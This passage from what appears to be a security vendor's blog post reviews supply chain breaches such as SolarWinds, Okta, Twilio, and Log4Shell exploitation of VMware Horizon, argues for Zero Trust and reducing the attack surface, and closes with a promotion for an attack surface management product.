Preventing developer-centric issues will involve the package managers and repositories enforcing more security measures on behalf of the developers. While it may not be possible to vet each package, ones that are integral to thousands of software projects should be reviewed for malicious code or significant changes to the functionality. 

Large Software Vendors 

The exploitation of SolarWinds in 2020 by the Russian government first brought supply chain security onto centre stage. Hundreds of organisations were compromised in what is considered one of the most successful attacks in history. Since then, supply chain attacks have gotten creative against package managers and developers. But the level of access and reach gained by targeting the likes of SolarWinds remains extremely popular, especially with advanced hacking groups.

Most recently we have seen the Okta and Twilio breaches. Okta, a supplier of identity and access management, was breached by the group Lapsus$, and over 350 of its corporate customers were affected. The breach itself was caused by a third-party service provider (supply chain-ception?), showing how nested the supply chain has become. Twilio’s breach affected its authentication service Authy, which subsequently affected 125 Twilio customers. The breach was part of the 0ktapus phishing campaign, so named for targeting Okta customers via phishing attacks.

Back in 2021 the Log4Shell vulnerability had the cybersecurity industry scrambling. Due to the immense effort of so many people, mass exploitation was avoided. However, the aftershocks of the vulnerability were felt in 2022, no more so than in the exploitation of VMware Horizon. This product enables virtual desktops and applications and is used by thousands of large organisations. Attackers leveraged the exploit in Horizon to target Microsoft, the UK’s NHS, CrowdStrike and more. 

These more complex and advanced attacks are difficult for many organisations to prevent, as the compromised software can form an integral part of a company’s business. Instead, companies can take steps to slow down attackers and mitigate any meaningful malicious actions.

We need a paradigm shift from standard perimeter-based networks, where everything internal is considered a trusted asset, to more of a Zero Trust architecture. This is a long, arduous process, but many security steps aid it, such as network segmentation, endpoint detection, and gaining a full understanding of the attack surface. This shift is a topic I’m passionate about, and I had the chance to contribute to CyberWire Pro on a related incident: the implications of the recent MOVEit exploitation for software supply chain security.

“…There is not a single responsible party for the supply chain, it’s down to the vendors, the repositories, the software consumers and the developers. The second half of 2023 should be when we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way.” 

Read the full quote here.

To reduce the likelihood of any one third party being compromised, an organisation should attempt to minimise its attack surface and reliance on the supply chain. It is becoming common practice to hand off security to a vendor, but no one is going to care more about your security and your data than you. The more control you have over your systems, the better placed you are to identify threats in the supply chain and in any other part of your systems.

Conclusion 

2022 brought an increase in supply chain attacks across the board, with many of these attacks carried out by less sophisticated actors at much broader scales. The supply chain now looks more like a web, and it’s more difficult than ever to fully understand what risks you bring in through your third-party vendors.

But there is hope. Organisations are now seeing the risks of the supply chain clearly and beginning to take action. There is not a single responsible party for the supply chain — it’s down to the vendors, the repositories, the software consumers and the developers. 2023 should be the year we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way. 

NetSPI’s team of offensive security specialists can help! Our Attack Surface Management solution gives security teams insight into their attack surface, and helps monitor changes, validate vulnerabilities, and prioritize remediation efforts.  

See Attack Surface Management in action with this on-demand demo
